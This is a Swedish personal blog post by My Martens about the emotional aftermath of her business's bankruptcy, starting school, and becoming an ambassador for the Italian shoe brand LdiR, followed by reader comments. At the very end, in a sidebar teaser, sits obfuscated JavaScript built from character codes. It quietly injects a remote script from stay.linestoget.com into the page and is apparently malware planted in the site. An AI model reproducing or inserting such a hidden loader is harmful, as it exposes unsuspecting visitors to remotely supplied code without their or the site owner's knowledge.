Fyra veckor efter konkurs! Skola, nystart! -Ambassadör LdiR. Stort grattis Terece till agenturen!

IMG_8676IMG_8675

Hej igen! Just nu sitter jag i bilen. Påväg upp från Öland mot Stockholm igen. Mååååånga mil i bilen blir det. Just idag är det ganska skönt. Idag är jag som ett känslomässigt kaos! Förkrossad och förväntansfull på samma gång. Glad OCH ledsen. Hur är det ens möjligt?

Idag för en månad sedan, satte jag My’ S Blommor i konkurs. Jag hade varken sovit eller ätit på veckor. Jag var så nära en total kollaps som man kan komma. Förvrivlad, ledsen, sårad….. Trött. Läs gärna mitt inlägg från tingsrätten HÄR!

Jag har hunnit landa i situationen nu. Jag har fått hjälp med sömn och terapi. Jag bad om hjälp själv, jag ör mottaglig och vill inte fastna i psykisk ohälsa. Jag förstår inte varför det är så ”tabubelagt” varför det är fult att  må psykisk dåligt?! Jag skäms inte över det. Jag menar, vi alla utsätts för olika typer av prövningar genom livet. Det vore väl konstigt om man inte upplevde ångest och pankångestattacker när man går igenom vissa saker. Konkursen är en sorg för mig. Dom miljonerna jag genom åren förlorat kan jag leva med. Men känslan av att ge allt, hela sin själ och lite till och ända ”misslyckas”. DET gör ont! Att se hela mitt livsverk gå i bitar. Att ”svika” min personal, mina fantastiska medarbetare……… Det gör riktigt ont!

Evelina & Vickan ni är helt j*vla outstanding! Ni har och kommer ALLTID att ha en speciell plats i mitt hjärta <3

Jag ljuger om jag säger att jag mår bra idag. Det gör jag inte.  Jag är ledsen, jag tampas fortfarande med ångest. Men tack vara min överlevdasinstinkt, min psykolog och mina nära och kära. Så har jag hittat ett sätt att förhålla mig till det. Jag har fått tillbaka min kämparglöd och tar full sats uppåt. Upp från mitt svarta hål.

Jag har nu lämnat Lillemam hos sin pappas tjej. Grinade även när jag lämnat honom….. Det är rörigt på insidan nu.

Jag körde upp till butiken. Satt där ensam, lyssnade på fåglarna och grät. Grät som ett barn…….. Skyltarna sitter forfarande kvar. Vissa saker är sig likt. Vissa saker är redan borta. Men känslan, känslan finns inte kvar. ”My’s” mentalitet, tanke och känsla är helt borta. Det känns istället kallt, dött och ångestladdat. Jag upplever det så. Kanske tycker du att det är självplågeri att sätta mig där. Kanske har du rätt. Men det jag ville göra det. Jag är inte klar än.

Jag har separationsångest. Tio år av mitt 28 åriga liv är lång tid. Jag har varit med om så galet mycket under dessa år. OM dessa väggar kunde tala……. Jag vet inte riktigt vem jag är utan My’s Blommor. Men jag har lärt mig otroligt mycket under dessa är. På både gått och ont såklart. Jag skulle inte vilja byta ut dessa åren mot någonting annat. Det har format mig till den jag är.

jag ska ta med mig erfarenheterna, förvalta dom väl. Jag ska hitta mig själv och resa mig starkare än någonsin! Just nu är det okay att vara ledsen, det är okay att gråta. Det är en del av processen. Det krävs i bearbetningen för att kunna läka inifrån och ut. Det har inte gått särkilt lång tid, jag har ändå kommit en bra bit framåt. Nya spännande projekt är på gång. Flera jobb och erbjudanden. Jag är SÅ tacksam för det.

imorgon börjar skolan. Min första dag på SAFE. Ett beslut jag tog. Det känns verkligen så rätt i magen. 

Ett annat projekt är att jag redan Ikväll ska jag hem till Terece min väninna, kollega och designern bakom Love Forever. Du som har följt mig länge här inne vet att jag under många år använt både Love Forever. Men också LdiR. Det Italienska märket Lartigianodiriccione.

image

Handgjorda, välarbetade skor i en helt egen klass. Jag har forfarande kvar mitt första LdiR par som jag köpte för fyra år sedan.  Det är dom absolut skönaste skorna som jag någonsin har gått i. Jag bara ÄLSKAR känslan, stilen och hantverket bakom dessa. Italienskt är italienskt. 

Jag blev kontaktad av LdiR för ett tag sedan. Jag kommer att vara deras ambassadör. Jag är SÅ glad och smickrad över detta!

Jag har i flera år haft en liten dröm om att åka ner till Italien , hälsa på i fabriken och träffa familjeföretaget som ligger bakom LdiR. Kanske, när mitt utreseförbud gått ut, då kanske det kan bli av. 

LdiR är dom riktiga ORIGINALEN. Ingenting kan jämföras med dessa! verkligen inte… Som jag skrev så har jag testat många andra liknande märken. Men en gång en LdiR tjej, alltid en LdiR tjej! 

Nu till det absolut roligaste. Min väninna Terece har precis tagit över och blivit agenturen för dessa fantastiska skor. Så genom Terece ska nu LdiR komma tillbaka på Svenska marknaden.

HUR kul är inte detta? -Stort GRATTIS Terece!!!!<3

Det passar hennes personlighet perfekt, OCH går hand i hand med hennes märke Love Forever. Love Forever erbjuder en boho Chic och Rock n roll stil! Passar alla åldrar OCH mig perfekt!

Redan nu ikväll ska vi testa, känna och klämma på alla nyheter ifrån höstkollektionen som snart  kommer att finans på Love Forevers webbshop.

Även en photosession ska göras så att både DU och eventuella återförsäljare kan få ta del av dom =) 

IMG_8674 IMG_8673 IMG_8672

Det är mycket på en gång nu. Imorgon är som jag skrev ovan, min första dag i skolan. Jag är SUPER nervös. Varför vet jag inte. kanske för att det är så långt ifrån allt annat jag gjort. och kanske för att jag känner mig lite utanför min ”comfortzone”.

Men jag är sjukt taggad! Det ska bli så roligt! Förväntningarna är maximala och jag är hungrig på att lära mig! Jag kommer sova kvar hos Terece ikväll och köra direkt till skolan =)

Tiiiidigt måste jag gå upp. Ca 05:00. Men jag vill vara ute i god tid. Jag känner inte till området och måste vara säker på att hitta parkering. Skolan ligger nånstans på Södermalm.

Så som du märker så är hela jag känslofylld just nu. En salig blandning! Sorg, lycka, glädje, depression, förväntan, … Jag är lite av ett kaos. Men jag är ett kontroelatat kaos som ser ljust på framtiden! 

Kika in på Love Forevers sida HÄR sålänge REAN är i full gång =) Kram & puss!

/ My Martens

Foto: Linda Himsel 

27 Komentarer

 1. Ja, ditt liv är verkligen en berg o dalbana, men jag tror att det planar ut med tiden. Låt det ta den tiden o gör det som känns rätt. Det är ingen som kan säga att det är rätt eller fel mer än du. Som när du körde till butiken o sörjde. Du behövde väl få det ur dig.
  Många spännande saker du har på G.
  Lycka till i morgon ’skoltjejen’ ?
  Jag tror på dig !!

 2. Men skojar du!?! Ska du börjar på SAFE, jag har varit så nyfiken och så sugen, men attans vad dyrt det är, beroende på utbildning såklart. Snälla My kan du berätta om vilken utbildning du väljer och vad du förväntar dig få/bli utav det sen? Vill gärna bli mer inspirerad och suktad än vad jag redan är, för att våga köra. Lycka till fina du

 3. Ja, ditt liv är verkligen en berg o dalbana, men jag tror att det planar ut med tiden. Låt det ta den tiden o gör det som känns rätt. Det är ingen som kan säga att det är rätt eller fel mer än du. Som när du körde till butiken o sörjde. Du behövde väl få det ur dig.
  Många spännande saker du har på G.
  Lycka till i morgon ’skoltjejen’ 😄
  Jag tror på dig !!

 4. Men skojar du!?! Ska du börjar på SAFE, jag har varit så nyfiken och så sugen, men attans vad dyrt det är, beroende på utbildning såklart. Snälla My kan du berätta om vilken utbildning du väljer och vad du förväntar dig få/bli utav det sen? Vill gärna bli mer inspirerad och suktad än vad jag redan är, för att våga köra. Lycka till fina du

 5. Hej! Förra veckan var jag och familjen på dagsutflykt till Kalmar och tog färjan över till Färjestaden. Vi gick för att äta på hotell Skansen. Tänkte på dig då. Konstigt egentligen det känns ju som om man känner dig när man läser din blogg, men det gör man ju inte alls! Skum känsla egentligen om du förstår hur jag menar. Hade jag sett dig hade jag velat gå fram och ge dig en kram som tröst för det som varit och lycka till inför det nya. Hade du velat det, eller skulle det vara jobbigt och du helst hade velat vara i fred? Du får kram så här Iaf! Lycka till med skola och allt!

 6. Hej! Förra veckan var jag och familjen på dagsutflykt till Kalmar och tog färjan över till Färjestaden. Vi gick för att äta på hotell Skansen. Tänkte på dig då. Konstigt egentligen det känns ju som om man känner dig när man läser din blogg, men det gör man ju inte alls! Skum känsla egentligen om du förstår hur jag menar. Hade jag sett dig hade jag velat gå fram och ge dig en kram som tröst för det som varit och lycka till inför det nya. Hade du velat det, eller skulle det vara jobbigt och du helst hade velat vara i fred? Du får kram så här Iaf! Lycka till med skola och allt!

 7. Roligt att du skall vara ambassadör för LdiR kan inte se att det finns någon bättre för svenska marknaden med ditt blonda vackra hår och snygg och vältränad ung och söt tjej!
  Jag har redan tagit in lite LdiR och dom finns nu i min webshp och jag kommer absolut vara en kund hos gulliga Tererce framöver. Terece är ju också en väldigt duktig och driven tjej!
  Ni som vill se några modeller kan gå in i min webshop på http://www.prettyhome.se
  Modellerna kommer denna veckan då jag beställt dom tidigare!

 8. Roligt att du skall vara ambassadör för LdiR kan inte se att det finns någon bättre för svenska marknaden med ditt blonda vackra hår och snygg och vältränad ung och söt tjej!
  Jag har redan tagit in lite LdiR och dom finns nu i min webshp och jag kommer absolut vara en kund hos gulliga Tererce framöver. Terece är ju också en väldigt duktig och driven tjej!
  Ni som vill se några modeller kan gå in i min webshop på http://www.prettyhome.se
  Modellerna kommer denna veckan då jag beställt dom tidigare!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/